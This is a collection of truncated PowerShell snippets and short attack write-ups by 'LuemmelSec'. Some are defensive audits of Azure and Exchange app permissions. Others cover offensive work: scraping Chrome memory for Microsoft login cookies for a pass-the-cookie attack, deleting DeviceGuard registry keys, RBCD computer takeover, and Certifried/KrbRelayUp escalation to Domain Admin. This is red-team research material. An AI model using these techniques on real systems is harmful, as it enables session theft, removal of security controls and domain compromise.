LuemmelSec

# PowerShell Script to check which Apps have the "full_acces_as_app" EWS role, so can read all Mailboxes
# There might be ApplicationAccessPolicies in place that afterwards restrict access to only certain mailboxes, so criticality would be reduced
# This is reflected in the output as well.
# This was written for PowerShell 7 - to work with PS v5 you need to exchange some modules and calls

# Check if ExchangeOnlineManagement module is available
$ExchangeOnlineModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable

# Check if Az.Accounts module is available
$AzAccountsModule = Get-Module -Name Az.Accounts -ListAvailable

LuemmelSec

# Run cvemap with our desired flags and output to json
# I needed to run this with cvemap version 0.0.2 as 0.0.3 broke the ability to pipe to a file for whatever reason
.\cvemap.exe -severity=critical -severity=high -es '> 0.01' -poc=true -l 1000 -json > new_vulns.json

# Paths to the JSON files
$newJsonFilePath = "new_vulns.json"
$databaseJsonFilePath = "cve_database.json"

# Read the newly fetched JSON file
$newJsonContent = Get-Content -Path $newJsonFilePath | ConvertFrom-Json

LuemmelSec

# This scriplet relies on https://github.com/glmcdona/strings2
# Import the script: PS> import-module .\Process_String_Extractor.ps1
# Run the function: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname notepad -SearchString "Hello World"
# To extract Cookies for O365 / Azure PTC Attack: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname chrome -SearchString "ESTSAUTH","SignInStateCookie"

function ScrapeProcessMemory {
        Param(
            [Parameter(Mandatory)]
            [string]$Processname,
            [Parameter(Mandatory)]

LuemmelSec

# A simple PowerShell script to check to which apps the user consented to and which permissions were granted

# Install the required PowerShell modules if they're not already installed
Install-Module -Name AzureAD

# Connect to Azure AD
Connect-AzureAD

# Get the user object for the signed-in user. UPN e.g. administrator@yourcompany.onmicrosoft.com
$user = Get-AzureADUser -ObjectId (Get-AzureADUser -SearchString "<your user principal name>").ObjectId

LuemmelSec

$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

function Show-Menu {
    Clear-Host
    Write-Host "======================================================"
    Write-Host "================ Give Back Control ================"
    Write-Host "======================================================"
    if($elevated -eq $true){
        Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green 
        Write-Host "We have superpowers. Ready to continue."        

LuemmelSec

# Steps needed to disable DeviceGuard with UEFI lock

# Disable DeviceGuard in registry
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'

# Change UEFI settings. Reboot and confirmation needed.
mountvol X: /s

LuemmelSec

# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

LuemmelSec

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

• Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
• Relaying that machine authentication to LDAPS for configuring RBCD
• RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

LuemmelSec

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites: